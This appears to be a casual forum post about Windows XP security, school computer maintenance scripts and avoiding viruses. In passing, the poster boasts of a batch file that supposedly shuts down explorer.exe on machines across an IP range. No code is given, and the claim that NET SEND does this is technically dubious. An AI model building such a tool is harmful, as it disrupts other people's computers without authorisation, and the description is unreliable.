At school I have all the newer computers set to boot up at midnight on Saturday, scan and defragment the hard drives, and clear the Temporary Internet Settings, and then they shut off. It makes things easier for me, anyways.

It's a combination of a batch file and Automated Tasks.

I've got a NET SEND batch file on a floppy at home that sends a "terminate" signal to explorer.exe within a cartain IP range.

But I digress...

Uh oh, I'm running Windows XP Pro. I'm not too worried its all new so if I get infected I just reinstall all the stuff.

Maybe I'll try running DSL on my laptop. I'm not 100% sure it will work as its an Athlon64.

On a serious note, this isn't really surprising- Windows it just to easy to exploit. Just do what you normally do (assuming of course you don't go to porn/warez/ROM sites all the time) to avoid virui.
